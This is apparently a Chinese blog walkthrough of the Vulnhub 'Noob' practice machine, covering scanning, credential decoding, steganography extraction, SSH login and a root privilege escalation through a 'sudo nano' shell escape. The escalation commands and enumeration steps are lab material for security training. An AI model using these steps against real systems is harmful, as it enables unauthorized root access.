Vulnhub Noob靶机复现(附提权)

一、安装靶机

下载地址:https://download.vulnhub.com/noob/Noob.ova

下载好后使用VM打开配置如下。

二、主机发现

使用nmap扫描确认靶机ip(192.168.29.138)

复制代码
nmap -sn 192.168.29.1/24

三、端口扫描

使用nmap工具扫描全部端口以防遗漏。

复制代码
nmap -A -p- 192.168.29.138

四、目录探测

使用kali里最全的大字典去扫描。扫描出来后进行访问,查看有哪些网页目录可以利用(不要网了敏感目录)。

复制代码
gobuster dir -u http://192.168.29.138/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

五、web渗透/提权

端口扫描的时候知道我们的靶机开启了21端口ftp服务,而且里面有两个文件,下载下来看看。

cred里面的东西解码看一下是一个账号密码,应该是登录用的,welcome没啥用。

复制代码
Y2hhbXA6cGFzc3dvcmQ=

champ:password

点击About Us会下载一个压缩包,打开后就只有这些东西。图片应该还会有东西,使用工具提取一下,看看里面有什么我们没有注意到的。

bmp文件内存在隐写,查看内容。

复制代码
apt install steghide

steghide extract -sf funny.bmp
steghide info funny.jpg

cat user.txt
cat hint.py

将user.txt文件里的数据根据py文件的提示解密(rot加密)。或许是没有用到的55077端口ssh的账户密码

复制代码
wtf:this one is a simple one

还有一个55077端口的ssh服务,连接一下看看。

复制代码
ssh wtf@192.168.29.138 -p 55077

在目录下找出flag和backup文件里的另一个账户密码。

flag解码后没有啥用,切换到另一个用户里面。

查看可以使用root权限的文件

复制代码
sudo -l

执行下列命令提权

复制代码
sudo nano

Ctrl+r ,Ctrl+x

reset; sh 1>&0 2>&0

完结撒花✿✿ヽ(°▽°)ノ✿

相关推荐
RisingFan3 天前
【春秋云境】CVE-2025-26319 FlowiseAI未授权任意文件写入导致命令执行漏洞复现
漏洞复现·春秋云境·cve-2025–26319
不正经绣才3 天前
【扣子Coze教程】160+音色,多种情感 | 0成本搭建智能体(专业AI配音师)
教程·工作流·智能体·coze·扣子·ai配音
不正经绣才4 天前
飞书多维表格工作流指南(AI日报小助手)
ai·飞书·教程·工作流·扣子
QuantumRedGuestk7 天前
FineCMS 存储型 XSS 漏洞分析与防御建议
xss·漏洞复现·finecms靶场
xcLeigh16 天前
Python入门:Python3 数据结构全面学习教程
数据结构·python·学习·教程·python3
-曾牛16 天前
域渗透:域控攻击全流程详解(含多种新型漏洞利用)
网络安全·渗透测试·内网渗透·漏洞复现·域渗透·原理解析·域控攻击
梓贤Vigo18 天前
【Axure视频教程】制作动态排名图并导入Axure
交互·产品经理·axure·原型·教程
Tan385121 天前
如何在 OfficeAI 上配置 API Key(图文教程)
开发语言·人工智能·c#·api·教程·officeai
0vvv025 天前
Vimer
linux·靶机
0vvv025 天前
Mao靶机复现
靶机